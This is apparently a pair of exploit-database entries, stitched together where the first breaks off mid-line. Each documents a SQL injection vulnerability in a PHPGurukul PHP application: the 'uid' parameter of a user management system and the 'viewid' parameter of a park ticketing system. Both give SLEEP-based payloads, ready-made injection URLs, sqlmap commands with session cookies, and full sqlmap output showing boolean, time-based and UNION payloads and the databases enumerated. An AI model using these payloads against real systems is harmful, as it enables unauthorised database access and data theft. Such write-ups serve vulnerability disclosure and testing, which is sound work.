# Exploit Author: Zeyad Azima
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/user-management-system-in-php-using-stored-procedure/
# Version: V1
# Tested on: Windows

# Identify the vulnerability
1- go to http://localhost/admin/ and login with your account
2- then go to http://localhost/admin/registered-users.php
3- Click edit on any user and then add the following payload to the url

payload: AND (SELECT 5008 FROM (SELECT(SLEEP(5)))zVHT)
url: http://localhost/ums-sp/admin/edit-user-profile.php?uid=3%20AND%20(SELECT%205008%20FROM%20(SELECT(SLEEP(5)))zVHT)

If the web server makes you wait 5 seconds then it's vulnerable

# Exploit
Now you can exploit it using sqlmap command: sqlmap -u url --cookies="cookies here" --dbs
example: sqlmap -u http://localhost/admin/edit-user-profile.php?uid=3 --cookie="PHPSESSID=dtp3titus8giv9bpdmimi6r6f1" --dbs

        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.4.10.16#dev}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:55:16 /2021-01-29/

[22:55:16] [INFO] resuming back-end DBMS 'mysql'
[22:55:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uid (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: uid=(SELECT (CASE WHEN (7929=7929) THEN 3 ELSE (SELECT 1849 UNION SELECT 3460) END))

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uid=3 AND (SELECT 5008 FROM (SELECT(SLEEP(5)))zVHT)
---
[22:55:16] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.41, PHP 7.3.10
back-end DBMS: MySQL >= 5.0.12
[22:55:16] [INFO] fetching database names
[22:55:16] [INFO] fetching number of databases
[22:55:16] [INFO] resumed: 6
[22:55:16] [INFO] resumed: mysql
[22:55:16] [INFO] resumed: information_schema
[22:55:16] [INFO] resumed: performance_schema
[22:55:16] [INFO] resumed: sys
[22:55:16] [INFO] resumed: umspsdb
[22:55:16] [INFO] resumed: zmsdb
available databases [6]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] umspsdb
[*] zmsdb

[22:55:16] [INFO] fetched data logged to text files under
  24. # Exploit Title: Park Ticketing Management System 1.0 - 'viewid' SQL Injection
# Google Dork: N/A
# Date: 29/1/2021
# Exploit Author: Zeyad Azima
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/park-ticketing-management-system-using-php-and-mysql/
# Version: V1
# Tested on: Windows

# Identify the vulnerability
1- go to http://localhost/index.php and login with your account
2- then go to http://localhost/manage-normal-ticket.php
3- Click view on any ticket. then add the following payload to the url

payload: ' AND (SELECT 8292 FROM (SELECT(SLEEP(5)))XIQB) AND 'QCDH'='QCDH
url: http://localhost/view-normal-ticket.php?viewid=1%27%20AND%20(SELECT%208292%20FROM%20(SELECT(SLEEP(5)))XIQB)%20AND%20%27QCDH%27=%27QCDH

If the web server makes you wait 5 seconds then it's vulnerable

# Exploit
Now you can exploit it using sqlmap command: sqlmap -u url --cookies="cookies here" --dbs
example: sqlmap -u http://localhost/view-normal-ticket.php?viewid=1 --cookie="PHPSESSID=dtp3titus8giv9bpdmimi6r6f1" --dbs

        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.4.10.16#dev}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:19:33 /2021-01-29/

[23:19:34] [INFO] resuming back-end DBMS 'mysql'
[23:19:34] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: viewid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: viewid=1' AND 5743=5743 AND 'wcUF'='wcUF

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: viewid=1' AND (SELECT 8292 FROM (SELECT(SLEEP(5)))XIQB) AND 'QCDH'='QCDH

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: viewid=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a767a71,0x6f5367494d7573444b726d466e617a77735574536d49466a654d6569746b4972745556686a4e4548,0x716a767671),NULL,NULL,NULL-- -
---
[23:19:34] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.41, PHP 7.3.10
back-end DBMS: MySQL >= 5.0.12
[23:19:34] [INFO] fetching database names
available databases [8]:
[*] detsdb
[*] information_schema
[*] mysql
[*] performance_schema
[*] ptmsdb
[*] sys
[*] umspsdb
[*] zmsdb

[23:19:34] [INFO] fetched data logged to text files under